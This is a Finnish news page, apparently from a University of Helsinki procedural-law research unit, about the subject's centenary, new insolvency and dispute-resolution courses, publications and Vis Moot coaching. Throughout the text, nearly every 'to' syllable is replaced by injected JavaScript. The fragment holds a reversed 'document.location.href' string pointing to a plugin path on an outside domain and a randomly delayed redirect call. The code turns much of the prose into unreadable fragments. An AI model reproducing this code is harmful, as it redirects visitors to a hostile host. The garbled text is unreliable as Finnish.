Sata vuotta prosessioikeutta

,

Vuosi 2021 on prosessioikeuden merkkivuosi, joskaan mikään ei vielä viittaa siihen, että siitä tulisi samalla juhlavuosi. Vuoden merkityksen tuntevat vain akateemiset tutkijat ja aatehistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torian asianharrastajat. Prosessioikeus yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollisena oppiaineena sai nimittäin alkunsa sata vuotta sitten, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toisin sanoen vuonna 1921. Silloin perustettiin Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toon ensimmäinen prosessioikeuden virka, ja se pääsi oppiaineena viralliselle oppiaineiden listalle. Oppiainekartalla prosessioikeus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toki on arrivista pari vuosikymmentä vanhempien siviilioikeuden ja rikosoikeuden seurassa. Tietenkin se on ikivanha kauppaoikeuden, ympäristöoikeuden ja eurooppaoikeuden kaltaisten päiväperhojen vertailussa.

Alku oli kuitenkin toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todella vaatimatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. Virka oli nimittäin yhdistetty rikos- ja prosessioikeuden apulaisen (mikä vastasi nykyistä apulaisprofessoria) virka. Sen kaksi ensimmäistä haltijaa Kaarlo Ignatius ja Bruno Salmiala eivät sitä paitsi prosessioikeuden opettajina ja tutkijoina juuri kunnostautuneet, vaikka he tekivät merkittävän elämäntyön muualla. Vuonna 1924 virka muutettiin prosessioikeuden vaihtuvaksi professorin viraksi ja vuonna 1938 kiinteäksi. Silloin omaksuttu virkanimike prosessioikeuden professori jäi pysyväksi, joskin jossain vaiheessa harkittiin sen muuttamista viran alaa paremmin vastaavaksi prosessi- ja insolvenssioikeuden professorin viraksi. Modernin prosessioikeuden perustan loivat pitkän professorinuran tehneet Tauno Tirkkonen (hän oli samalla mainitun yhdistetyn apulaisen viran kolmas haltija) ja Jouko Halila, osaksi myös Tauno Ellilä, vaikka yleinen prosessioikeus ei ollut hänen ydinalueettaan.  Jouko Halila oli aikanaan outoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ilmestys monialaisuudessaan ja liikkuvuudessaan, mitä arvoja hänen aikansa ei juuri arvostanut. Nykyaikahan sen sijaan pitää niitä välttämättöminä.

Prosessioikeus oikeudenalana alkoi hajota 2000-luvulla, kun oppiaine jaettiin erillisiin yleisen prosessioikeuden ja insolvenssioikeuden tenteiksi. Opetuksellisesti oppiaine hajosi lopullisesti vuonna 2017, kun insolvenssioikeus siirrettiin vanhalta paikaltaan yksityisoikeus I -nimiseen opetuskokonaisuuteen. Tällöin se muuttui kolmannen opiskeluvuoden murheenkryynistä ensimmäisen vuoden opiskelijoiden painajaiseksi. Tosin pedagogisesti siirtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to oli erinomaisen perusteltu: insolvenssioikeutta kannattaa opettaa velvoite- ja esineoikeuden yhteydessä, koska sillä on aika vähän tekemistä oikeudenkäyntien ja tuomioistuinten kanssa, joihin taas (yleinen) prosessioikeus keskittyy. Totta on, että kaikki opiskelijat eivät tunteneet saaneensa helpotusta opiskeluunsa. Insolvenssioikeutta kun pidettiin ja pidetään, osaksi aiheestakin, vaikeana oikeudenalana, koska se on niin vieras ei-juristeille. Tutkimuksellinen asumusero oli tapahtunut jo paljon aikaisemmin, kun perinteinen ulosottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to- ja konkurssioikeus muuttui laaja-alaiseksi insolvenssioikeudeksi. Yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollisissa virkarakenteissa muutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosta osoitti viimeistään vuonna 1996 perustettu insolvenssioikeuden professorin virka, joka kylläkin jäi määräaikaiseksi ja lakkasi vuonna 2001.

Sisällöllisesti prosessioikeus on nykyisin jotain aivan muuta kuin 1920-luvulla, jolloin se nähtiin teknisiksi menettelyopeiksi. Oikeus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toteutuu prosessien kautta, turhaan ei sanota, että ”’justice’ is a process, not an outcome”.  Nykyisten oikeudenmukaisen oikeudenkäynnin nimellä kutsutun ihmisoikeuden ja access toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to justice -ideologian juuret ovat joltain osin vuoden 1921 kaukonäköisessä päätöksessä.

Uusi käytännön taidot -kurssi ”Yrityksen maksukyvyttömyys” käynnistyy syksyllä insolvenssioikeuden oppiaineessa

,

Useimmat lakimiehet joutuvat työurallaan tekemisiin yrityksen maksukyvyttömyyden kanssa joko aktiivisena toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimijana (esimerkiksi konkurssin pesänhoitajana tai saneerauksen selvittäjän) taikka yksittäisen velkojan ja velallisen edustajana. Insolvenssimenettelyjen arkipäivä (law in action) poikkeaa kuitenkin aika tavalla siitä, mitä laki säätää tai OTM-tutkinnon oppikirjat siitä kertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovat (law in books).

Uuden kurssin tarkoitus on perehdyttää osanottajat siihen hiljaiseen tekijäntietoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toon, jota osaava ja vastuullinen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiminta yritystä koskevassa insolvenssimenettelyssä välttämättä vaatii. Kurssi kuuluu Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton oikeustieteellisen tiedekunnan oppiaineen valinnaisiin opintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toihin. Sen vastuuopettajana toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimii OTT, yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonlehtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tori Heidi Lindfors. Kurssin opetuksen järjestää suuri helsinkiläinen Eversheds Sutherland -asianajotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Seminaarityyppistä kurssia tulevat vetämään maksukyvyttömyysasioihin erikoistuneet asianajajat Tuomas Penttilä ja Miika Huhtinen.

Kurssi on hyväksytty tiedekunnan 2020–2022 opetusohjelmaan. Ensimmäisen kerran se järjestetään syksyllä 2020, joskin COVID19-epidemia voi tuoda muutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toksia käytännön järjestelyihin. Osanottajamäärä on rajoitettu, koska kurssi järjestetään Eversheds Sutherland –toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton tiloissa (Fabianinkatu 29).

Uutta tutkimusta ilmestyy

, ,

Kirja ”Oikeuksiin pääsyn rahoittaminen” ilmestyy syksyllä 2020 tutkimusyksikön sarjassa.

”Oikeusvaltio ja sen kehittyneempi versio hyvinvointivaltio lupaa kansalaisilleen paljon oikeuksia. Harva heistä kuitenkaan tyytyy siihen, että oikeudet luetellaan lakikirjassa ja kansalaisoppaissa: oikeuksiin myös pitää toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosiasiallisesti päästä. Se taas vaatii toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimivia tuomioistuimia, osaavia lakimiehiä ja reiluja oikeudenkäyntejä. Kaikki tämä maksaa. Euroopan maissa ajankohtainen huolenaihe on, mistä säästövaatimusten yleistyessä oikeutta hakevat saavat rahaa oikeudenkäynteihinsä ja miten tuomioistuinjärjestelmää kyetään rahoittamaan.

Tämä tutkimus arvioi käytössä olevia rahoitusmuotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toja ja ottaa kantaa rahoituksellisten innovaatioiden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimivuuteen Suomen kaltaisessa pienessä oikeuskulttuurissa. Oikeudenkäynnin rahoituksessa tarkastellaan sekä perinteistä asianosaisrahoitusta että muodikasta sivullisrahoitusta. Tuomioistuinten rahoituksessa esille otetaan julkisen rahoituksen kehitys sekä muut rahoituksen vaihtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toehdot.”

Kirja on saatavilla lokakuussa 2020. Kirja lähetään maksutta yhteistyökumppaneille ja siitä kiinnostuneille. “Oikeuksiin pääsyn rahoittaminen” on osa Conflict Management Instituten access toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to justice -tutkimusohjelmaa. Seuraavaksi ilmestyy niin sanottuun regulatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory redress -tutkimuslinjaan kuuluva tutkimus “Oikeussuojaa viran puolesta – julkiset asiamiehet oikeuksiin pääsyssä”, arvioitu ilmestymisaika kevät 2022.

Ristoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Koulu on prosessioikeuden professori emeritus (Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to) sekä tutkimusjohtaja (Conflict Management Institute).

Alustatalouden innovaatioita konfliktinhallintaan?

,

Digitalisaatio ja digitalisoituminen on luonut alustataloudeksi kutsutut markkinat. Alustatalous edellyttää uusia ja ennen näkemättömiä liiketoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiminnan malleja, esimerkkeinä Amazonin ja Ebayn kaltaiset maailmanlaajuiset verkkokauppatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiminnot. Edistyksellinen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimintaympäristö puolestaan pakottaa innovatiiviseen riidanratkaisuun.

Alustatalouden riidanratkaisu on pitkälti autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatisoitua: se perustuu digitalisoiduille rutiineille ja oikeudellisille algoritmeille. Suotuisassa toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimintaympäristössä päästään näin ollen hämmästyttävän lähelle prosessioikeuden tutkimuksen saavuttamattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaksi väitettyä ihannetta, nopeaa (lähes reaaliaikaista), halpaa (ellei ilmaista) ja kohtaisen oikeusvarmaakin riidanratkaisua.

Apulaisprofessori Riikka Koulu (Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to) ja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tohtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torikoulutettava Jenni Hakkarainen (Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to) analysoivat digi-aikakauden innovaatioita ja niiden hyödyntämistä perinteisemmässä konfliktinhallinnassa artikkelissaan ”Konfliktinhallinta alustataloudessa”. Artikkeli sisältyy kokoomateokseen ”Jakamistalousjuridiikan käsikirja”, kustantaja Alma Talent 2019 (ss. 441-480).

Yksityinen täytäntöönpano – Pandoran lipasko?

,

Vaikka vaihtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toehtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toinen riidanratkaisu on ollut kaikkialla menestystarina, se on kärsinyt pahasta rakenteellisesta rasitteesta. Siinä syrjäytetään – jonkun mielestä marginalisoidaan – tuomioistuin ja oikeudenkäynti. Täytäntöönpanossa riitapuolen on kuitenkin käännyttävä julkisen vallan puoleen, koska täytäntöönpano on perinteisesti ollut julkisen vallan yksinoikeus, monopoli. Vaihtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toehtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiseen riidanratkaisuun voidaan kuitenkin usein kytkeä järjestelyjä, jolloin myös ratkaisun täytäntöönpanosta tulee ”vaihtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toehtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toista” tai kuten sanotaan ”yksityistä”.

Yksityisessä täytäntöönpanossa on hyvät ja huonot puolensa. Oikeuksiin pääsy varmistuu, mutta ongelmaksi nousee ”kärsivän” riitapuolen oikeussuoja. Tätä alkanutta ja varmasti kiihtyvää kehitystä kuvataan OTT, apulaisprofessori Riikka Koulun artikkelissa: Verkkokaupan riidanratkaisu ja älysopimukset: täytäntöönpanon yksityistyminen prosessioikeuden tutkimuskohteena.

Artikkeli on ilmestynyt Oikeus-lehdessä 2019/3 (ss. 265-290).

Riidanratkaisu yritystoiminnassa -kurssi päätöksessä – opiskelijapalaute

,

Kurssi, joka kuuluu oikeustieteellisen tiedekunnan prosessioikeuden valinnaisiin opintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toihin, järjestettiin tänä syksynä kolmannen kerran. Kurssin vetäjinä toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimivat entiseen tapaan asianajaja Bernt Juthströn ja senior legal council Tanja Jussila. Kurssin vastuuopettajana oli edelleen OTT, yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonlehtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tori Heidi Lindfors.

Kurssin valintakriteerit, järjestelyt ja sisältö saivat yleisesti kiitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosta. Prosessioikeuden opetuksen ja etenkin oikeudellisen konfliktinhallinnan kurssin toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todettiin antavan hyvän tietoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topohjan kurssille osallistumiseen. Kurssin ansioksi katsottiin, että se

– antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toi kuvan yritysjuristin roolista ja asioimisesta yritysjohdon kanssa, ”johtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toa eivät pykälät kiinnosta”,
– osoitti riidanratkaisustrategian tärkeyden yrityksessä ja
toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toi esiin välimieslainkäytön, etenkin keskuskauppakamerin FAI-välimiesmenettelyn, merkityksen liike-elämässä.

Myöhemmiltä kursseilta toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toivottiin

– vahvempaa opiskelijoiden aktivointia, kuunteluoppilas eli ”horosposti” ei saa kurssista hyötyä, opiskelijat on ”pakotettava” aktiivisiksi,
– enemmän henkilökohtaista palautetta ja arviointia siitä, miten tehtävistä suoriuduttiin, ja
– paljon käytännön työtehtäviä, erityisesti kirjelmien ja asiakirjojen laatimista.

”Nämä käytännön taitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojen kurssit ovat ehdottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomasti hyvä tapa päästä edes auttavasti soveltamaan yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton piirissä opittua teoreettista tietoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomassaa tiiviimmin. Oikeat työt ovat toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toki asia erikseen. Kursseja voisi olla enemmänkin ja laajemmalla skaalalla (useammissa oppiaineissa).”

”Opetuksessa pyritään ilmeisesti laajemmin jo välttämään ulkoaopettelu-tenttejä ja käyttämään enemmän kirjoittamista ja prosessointia vaativia opetusmetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todeja. Siihen nämä käytännön kurssit sopivat erinomaisesti. Kiinnostusta selvästi olisi, kun tältäkin kurssilta karsittiin ainakin puolet ilmottautuneista.”

Lue lisää kurssista täältä.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiminnassa-kuva-1-e1574262073308.jpg”>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiminnassa-kuva-1-e1574262073308.jpg” alt=”” width=”950″ height=”1267″ />

Helsingin yliopiston Vis Moot-joukkueen valmennustiimi on vaihtunut

,

Kurssin vastuuopettajana ja joukkueen valmentajana toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiminut Santtu Turunen on siirtynyt Keskuskauppakamarin välimieslautakunnan pääsihteeriksi. Myös Turusen kanssa joukkuetta valmentanut Henrik Sajakorpi (Roschier) on luopunut valmentamisesta. Vanhasta valmennustiimistä jatkaa edelleen Daniil Levanov (HPP). Uusina valmentajina ovat aloittaneet Miisa Happonen (Roschier), Katriina Toivanen (Eversheds), viime vuoden joukkueessa kilpaillut Saara-Marja Lahtinen (HY) ja kurssin vastuuopettajana aloittanut Alexander Gurkov (HY).

KIITOKSET

Joukkueen, oli se mikä tahansa, valmentaminen on tunnetusti epäkiitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollista. Hyvä menestys on aina pelaajien tai muiden joukkueen jäsenten erinomaisuutta, huono taas aina valmentajien vika. Toki realisti tietää, että menestyneen joukkueen takana on valmentaja ja ammattitaitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toinen valmennus. Santtu Turunen on vuosikymmenen johtanut tiedekunnan vuosittain vaihtuvan Vis Moot -joukkueen valmentamista sekä kilpailumatkoja. Hän on myös ollut siinä tiedekunnan määräämänä vastuuopettajana, koska oikeustapauskilpailu on samalla prosessi- ja insolvenssioikeuden valinnaisia opintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toja.

Santtu Turusta on aihetta kiittää uhrautuvasta ja omistautuneesta panoksesta, jossa ei ole työtunteja ja korvauksia kyselty. Hän on samalla tässä tehtävässään tehnyt suomalaista välimieslainkäyttöä ja korkeatasoista tutkimusta maailmalla tunnetuksi.

Tiedekunnan joukkueet ovat, voimavarojen niukkuuden ja kilpailun tason tietäen, menestyneet välillä hyvin, välillä erinomaisesti. On kaikki syy uskoa, että menestys jatkuu uusinkin voimin, kiitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos Santtu Turusen pitkäjänteisen kehittämistyön ja joukkueiden eri tahoilta saaman tuen.

Ristoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Koulu
prosessioikeuden professori emeritus

Tiedekunta puntarissa – tutkimuksen viides arviointi

,

